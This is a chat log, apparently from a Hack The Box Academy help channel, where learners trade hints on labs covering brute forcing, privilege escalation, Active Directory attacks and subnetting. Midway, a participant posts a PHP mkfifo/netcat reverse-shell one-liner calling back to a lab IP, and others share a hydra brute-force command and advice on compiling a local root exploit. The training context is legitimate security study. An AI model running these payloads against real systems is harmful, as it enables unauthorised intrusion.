I guess I'm too green in all this but why do I need to put double bracelets and double ==???... if [[ "$counter" == 35 ]];then

Its just how the language has defined its intended use.

the double brackets and the == is explained later in the module

later????....

try replicating what's given to you in the section you're in right now

without you guys I would never been able to guess that one

you don't need double brackets or ==

I found a similar one in stackoverflow

You`re right!

@arctic sentinel The double-equal ("==") is an comparison operator, it compares the left and right side and returns either true/false. The single-equal ("=") is an assignment operator, it takes what is declared on the right and assigns it to the left.

it should also be noted that == is a string comparison operator, so it can't be used for integers

In Bash.

yes

Good luck mate, I'm scrapping this section. Wasted too much time already.

have you tried testing each service's brute force speed?

I've spent multi-hours, on each, over the last day-and-a-half doing all three protocols.

Yeah same here @final salmon This is the first exercise that actually feels impossible

I don't mind waiting, but the timeouts are making this difficult

one service is undoubtedly the best for brute forcing

I've tried SMB, SSH, FTP and SMB port 139

those are all the open services

Meh, regardless the solution shouldn't require multi-hours on even the slowest service.

i get how you feel

but if you brute force the right service you will get a hit

much faster than brute forcing any of the other services

I dont know what to reply to this lol, I tried them all. 3/4 timeout, 1 runs in 10 seconds giving solely [-] as result.. Am I dumb or am I missing something big? I tried all 4 services, on both CME and Hydra. I'm even trying to figure out how to do this now with John hoping to get an answer

Definitely not dumb bro. Password cracking is an aggravating process.

if you've gone through the entire list of passwords then ||try doing sort -u on the mutated list and remove the first 17000 passwords||

Thanks!!!!

No worries, good luck!

@dim wolf Trying this now. Can you explain the services to me? You keep hinting at why one service is better than others (faster, more reliable, etc). Which services are best and why?

usually if you're trying to brute force a service you'd want to brute force one that 1. can handle the load and 2. can give fast response times

so you just run hydra or whatever for about a minute on a service and it'll tell you how many requests per minute it's sending (cme doesn't do this)

the service that allows you to send the most requests per minute is the one you should brute force

you should, however, confirm that the requests are actually going through; you can probably do that with a small wordlist

Alright, that makes sense!

So keeping an eye on the service runtimes

and going for the fastest

Thanks for the help!!

anyone finished Broken Authentication - Skills Assessment?

i think many people have finished this module 😉 Where are you stuck?

@acoustic owl I will write you PM (don't want to spoil)

sure

password attacks lab - hard: Hi, I was able to do most of the lab, Found the Administrator NTLM hash, and now I am trying to hack it.. tried everything: john, hashcat.. regular password.list and mutated.. non of them worked.. any help?

Please help me, I really want to finish this module already.. took me soooo long!

You can send me a DM

Hello

Anyone knows how can I get zero click exploit?

Need some help. Linux priv escalation module.
Says I need to wget this exploit https://vulners.com/zdt/1337DAY-ID-30003
Couldnt make that happen for some reason so I copied the code to a textfile and ran it instead providing me with this error, then I removed the last line but then the exploit didnt give me root

I cannot acess to pwnbox why?

Has anyone done Windows command line? I need help with a question I'm stuck on. I can't get the syntax right

back at this again? if you keep asking for dump shit like this you will get the 👢 from pwning

lol

compile the exploit on your machine and move / run the compiled on the target machine also did linpeas show you that target machine is vulnerable or something?

sure what's the issue?

Just found the issue, I did not read the page carefully enough had to read it again and found the syntax I was looking for. Thanks anyway :)!

No the module tells me to do the same that they are doing, which im trying but its not working

which section are you on?

you can't wget that link because it's not a raw file

didn't even realized he wget the thing

if you open the link there's a little download icon in the top right if you hover over the code

i just give the pwnbox a try and it's working just fine for me (a little note is free user only have a few hours of pwnbox in 1 day )

Yea I did that and tried to compile it myself, which gave me the error I cant solve

Oh ok, wrong download. I get it now

But it just downloads the textfile, which contains the same info as my file

try compiling it now

Does anyone know where the credentials are found in the hint "tomcatadm" on the box, for the module exercise -> Shells & Payloads' - 'The Live Engagement
without the hint, I would've never have found it.....

check your jumpbox desktop

if nothing's there check your home dir

@dusty timber if you are still having issue compiling the exploit try remove the comment on the very last line (that is not how you use comment is C)

so we are suppose to be given them, I thought it was just part of the hint, and if we tried to solve the box ourselves, we had to enumerate for them.

thanks

I am. Cant figure out how to get the file to the target lol

Will try that first

Didnt work

compile issue?

Yea same as in picture

so did you remove this thing (# 0day.today [2018-03-28] #) ?

omg

this time it worked

it's a comment for on the exploit (i think) date but that's not how you use comment for C

I deleted the entire line, that worked

Thanks a bunch @vital adder and @dim wolf

I removed that line before but it didnt work, it just didnt give me root. Maybe there was something wrong with the pasting I did I dont know

if you make one of the mod say UwU i'll help you with that

jk don't they will give me the 👢 in my the ass

the password for user2 is the answer on user1 same as for other user

how? a paid channel?

for that you use the flag on question 2 right?

read the FAQ

maybe delete that screencap..

reset the infra

it happened to me but a redeployment fixed it

yeah you may want to restart the target machine like calculac0re said i just give it a try and login using the flag from user1 work just fine for me

anyone around for a nudge on the Abusing HTTP Misconfig. module - need a sanity check on a payload nvm

In case you find a solution, could you give me a heads-up?

exactly. which line?

Is there a limit on Pwnbox usage?

hi all

And I thought I read the module thoroughly... Thank you so much ❤️

Could anyone assist me with a problem on the LFI module? kinda need a sanity check.

I used this system.

In the footprinting module for FTP, the question is asking what version of FTP is running? I submitted 220 InFreight FTP v1.1 as the answer, but it's saying it's wrong. That's my result from running nmap -sV -sC. Any help?

tried without the 220?

make sure there are no spaces

220 is a code that means something which i believe the codes were listed or linked to somewhere in the module . Submit it without the 220

It worked without the 220! Thanks yall!

np

anyone able to give me a nudge on the footprinting easy lab

i have read that the note contains mandatory information, but i dont want to view it just yet

trying to figure out how to get that info myself

Hey Guys! I have a question:

Currently on the "Introduction to web applications" module, and there's something that is explained but not this doubt I have in particular.

• If an attacker uses HTML Injection to add a custom form into a page, and manages to steal credentials by sending it to a server he hosts, can the Website owners track that traffic?

I'm completing Nibbles -initial foothold and when I try to listen through netcat it says it's listening on 0.0.0.0:9443. why is it not connecting to my ip address? When I go to the image.php link, nothing happens

did you set the correct port in the PHP file?

Nibbles took me forever...

guys Most of the machines, when I enter the http page, server not found comes up, but I can ping and do nmap !!!

if it redirects to a domain, add it to /etc/hosts

yes, to 9443

and your IP?

||<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.129.240.116 9443 >/tmp/f); ?>||

that's what I have

||The command I'm entering is nc -lvnp 9443||

spoiler the command for others

How do I do that?

||message content||

is your tun0 IP the IP you specified in the file?

No, it's of the ip that i'm attacking. Let me try editing the ip address

looks like a reverse shell so the script should call back to your IP

Still didn't work

tun0 address is under the field inet when you do ifconfig, right? or is it netmask?

look for tun0, the IP is after inet

Okay, yes that's the ip address I am using. The reverse shell is still not executing

you're missing the closing double quotes

I have them, Idk why that copied version doesn't have them. Maybe I added them in after copying to you

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 9443 >/tmp/f"); ?>

honestly not sure, if you didn't change the file name after reuploading, try doing that and navigate to the new file

try a different reverse shell

I've never had much luck with the mkfifo styled rev shell and php

I reset my instance and it worked!

I tried the same thing and couldn't get it to work. Did you just copy that into command line or use the php command first?

Sure but dosnt look good

no, i made a file named shell.php and copied that into the file

@tight mesa you had write permissions?

yes... where are you in the terminal? Have you connected via the reverse shell already?

sometimes you might not want to copy characters from the host OS to the guest OS

Yeah lol, I finished the box but I spent like 8 hours on it because after I spawned in I upgraded my shell with Python but had no write permissions. I couldn't create or write to any files. So I had to use the only application I had sudo over which was /usr/var/php
Took me a very long time but I managed to use php -a to open it interactively and use it to run a command as sudo which was cat /root/flag.txt

Thing is I don't know php so it was just hours of trial and error

Okay I'm stuck again. This is the question "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)" referring to tmux. Would the answer not be [ctrl] + [b] + [%]?

I'm still stuck on the box. I accidentally exited out of my reverse shell, and it wouldn't reconnect

Happened a ton to me. Sometimes I realized I was trying to connect to my own IP. I used the Metasploit module for it, but when I got errors with it, it was because I didn't change the location for uploaded files in the admin panel

Try to reproduce everything you did when it was successful

Hence why notes are so important

I did... multiple times

Did you reconfigure any settings in the admin panel?

What settings?

Admin panel as in when you log into the nibbles site?

Yes

There is a settings button, and even though you get an error when configuring the settings, some are still configurable

Not the username and password tho

you might need to reset the box

Currently stuck on a question within the SQLMAP ESSENTIALS module OS Exploitat section.

The hint is 'The flag is in a very common directory!'

I've gained an interactive OS Shell, however im unable to find a second flag after looking at nunmerous common directories.

Can someone provide a hint or nudge in the right direction?

@user21#6350 look in the root

You still there? I got to root, but I'm not seeing a root.txt file

The only file i see is monitor.sh

Can someone explain to me how htb works.... that'll be much appreciated

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Check the link above

gtfobins

Do you still need help?

Hello this may be a stupid question, but I'm doing the password attack: Default passwords module. Question is: Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>).
Nmap doesn't show me any mySQL service, I scanned the system for credentials through Sam's SSH connection. Where do I find this MySQL cred? The module is on default passwords/cred stuffing but I have no service to run it against?

The module mentoins a list of standard passwords. Search for this list

Right, got it, thanks!!

password attacks hard lab, I found johanna's password but dont know what to do there is a suspicious file keepas, what can I do next, can anyone help me?

think of a way of accessing the contents of that file

there is another user d. but I cannot run commands in smbclient when I am connecting to it, so I see no other ways, but to crack .kdbx, I thought .kdbx password would be the same but was mistaken

if your "command's" intent is to pull something from there, then adjust it as not always pulling something works straight out of the box

bump

Hard does a lot of back and forth with unhashing files

hi guys

the windows priv esc module is neat

as per usual my brain hurts

Hi guys,

Can someone explain how to solve the hard lab for Network Enumeration with Nmap

Does anyone also know what materials to use for Crest CRT ??

you guys managed to get SUBBRUTE work properly in the HTB modules VMs?

it hangs when i launch it with both python or python3 giving me few deprecation warnings and it just does nothing

tried also some tools like SUBFINDER but it requires an updated GO version to install :/

Thanks.

Hi guys,

Can someone explain how to solve the hard lab for Network Enumeration with Nmap

There is a specific port you need to find, to find it, you need to use something in your scan that is know to be used to scan when certain subnets are blocked from certain regions. The answer is in the last section before the labs. There is another option our scan needs. We need to appear as if we are scanning from a port that may be overlooked, the answer is also in that last section before the labs.

Thank you @deft escarp will try it out

Anytime, let me know if it doesn't work

anyone who did the ATTACKING COMMON SERVICES? this module is driving me crazy, almost nothing of all the tools explained in this module seem to work

Which chapter?

SMTP but also DNS has some tools suggested which dont seem to work (subbrute and subfinder). i just skipped that for now and im doing SMTP, found the user and trying to brute the PASS with their pws.list file (in resource) with hydra and nothing found

tried using o365spray but its not a o365 mail service

tried hydra with both smtp and pop3 commands but nothing

sometimes i dont understand if these modules require u to use also other personal skills to be completed or not, literally im trying everything learnt in the module but no results

Hello! I need help in the "Footprinting" module, in the section "IPMI" with the first question please!

I tried xfreerdp on Termux but it's not working, why?

Do you have an error message?

For SMTP, ignore the o365spray. Try using the tool from the User Command section for the username. Then its just a matter of brute forcing the user you find.

Yhh

It's saying something about the display parameters

Thanks will try again

No I was able to get the root flag! Thanks!

Do you mind sharing the error message and what platform / OS you're on so others here can help better?

In the module "Footprinting" the IPMI question 2, to get the cleartext password. Do i need to use a wordlist? And im using the -m 100 for SHA1, am i thinking right ?

I can't get that second question also

anyway i already got the user as i said before, its the bruteforcing that its not finding anything

idk if im supposed to use a different wordlist

The hashmode is incorrect

I used this || hydra -L user.list -P pws.list -f 10.10.110.20 pop3 || where in the user.list i just put the user i've found. tried also by just using || -l 'username' || instead of submitting a file. tried command with both pop3 and smtp

there is a metasploit module that can help you

if you are on the SMTP section

will try that too cuz hydra keeps telling me '0 valid password found'

you don't need a password, you need a valid name (username)

is that it?

i mean fuck then cuz the question in the module cleary says "credentials" and i supposed i needed both user and psw

god damn

Yeah might want to double check and see what username syntax pop3 expects when logging in. Just in case.

OH COME ON

thank u

ffs i didnt think about that

i feel dumb af now ahahahah didnt think it could've made a difference by using hydra but yeah now it makes sense lol

hi

Any nudge/hint on "AD Enumeration & Attacks - Skills Assessment Part I". Currently stuck on "Submit the contents of the flag.txt file on the Administrator desktop on MS01". No clue how to get to MS01 from WEB-WIN01 server. I've got the svc_sql account but can't auth on MS01 with it.

Glad you got it. 🙂

haven't gotten that far, but maybe kerberoasting?

Try evil-winrm with the user/pass you found from questions 1 and 2 🙂 And make sure you're accessing the correct machine.

yeah thank you! no matter what is gonna always be some mf syntax error that drives u crazy hahah

Oh dont I know it. I spent nearly an hour getting annoyed with Cyberchef, in Broken Authentication, because it doesn't convert cookies back in quite the same way. Decodes the cookies fine, but seems to add a bunch of extra padding when encoding. Had to end up writing a Python script to do the encoding

can anyone help me for the
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host. for AD Enumeration & Attacks - Skills Assessment Part II?
i got the domain admin account but I cant use evil winrm or xrdp into the place :Pepe_Hands:

PSRemoting?

Oh wait

sorry that's an earlier question

Same thing with evil-winrm, but using the mssqlsvc account

wait.. nvm i think i forgot to do somethinng

You might need to do some proxychaining

me?

No

@tough fjord Pls bro can you help me with this problem, subnetting sucks 😭

Submit the broadcast address of the following CIDR: 10.200.20.0/27

8/16/24/32
255.0.0.0/255.255.0.0/255.255.255.0/255.255.255.255

Oh, wait, you're asking the same question as dariomtc, so yes, you too

i did use proxychain from SQL01

what for wack 27?
🐿️

25 = 255.255.255.128

26 = 255.255.255.128+64

basically a bit is a power of 2

Afternoon all. New to HTB & Academy and loving the challenge so far. Not sure if anyone could give me a pointer (not the answer) on something if I post the details? Is that something that can be requested in here?

and it decreases as you approach the final 8th bit

have you tried using a calculator?

and yeah a calculator really helps here

owwkay so for 27 it would be

255.255.255.256

shit

i think consumed a lot of caffeine

1    1    1    1    1    1    1    1
128  64   32   16   8    4    2    1

owwwwwkay

undewrstood

so /27 would be 255.255.255.128+64+32

yes

thank you so much saviour, you taught me dsomething which i was not able to learn from weeks

thanks you so much @dim wolf

now you can calculate the broadcast address

yupp

nvm i completely forgot to do the ||ACL ATTACK||

I simply used the attack host as my pivot

Hey guys, does any1 know how long it takes to crack the root pass in Passwd, Shadow & Opasswd section of Password attacks module?

hi would somebody be able to help me with the skills assessment-website part of the login brute forcing module, I finished the first question but I’m not sure how to crack the login for admin_login.php, help would be greatly appreciated 😄

can anyone tell me why my exploit from exploit-db for msfconsole isnt showing up when i search for it in msfconsole? i put it in the spot where the other relative exploits are pulled from and its still not showing up

did you restart msfconsole after putting the exploit?

or there was a command i don't remember to refresh the exploits list

yeah i did try that

also tried sudo to see if its a permissions issue. didnt seem to change anything

and it wont let me run it manually either when i try something like 'use /exploits/linux/http/xxxx.rb

it just doesnt find it at all

and i made sure to put it in the right directory as FILENAME.rb

got it to work

needed to use reload_all

well got the module to run with an error. oh boy

undefined method 'split' for nil:NilClass

I remember I had the same issue, try playing with the options, you are on a right track

Try using the "where" command to pool / find all the reclusively in all the subfolders ... I'll give you a hint for last switch ... the key is the file size of the flag file ... that will pinpoint the flag

I need help withh the format of this question What is the URL of the WordPress instance? on attacking common application skill assessment II

does it have to do with the targeturi in options? or do i have to debug something

fqdn

ah got it

thx

think about the target you are attacking

i dont know how that helps me unfortunately

the error is too vague in that way for me to think about what im supposed to be doing here

some options are not optional in some cases

oh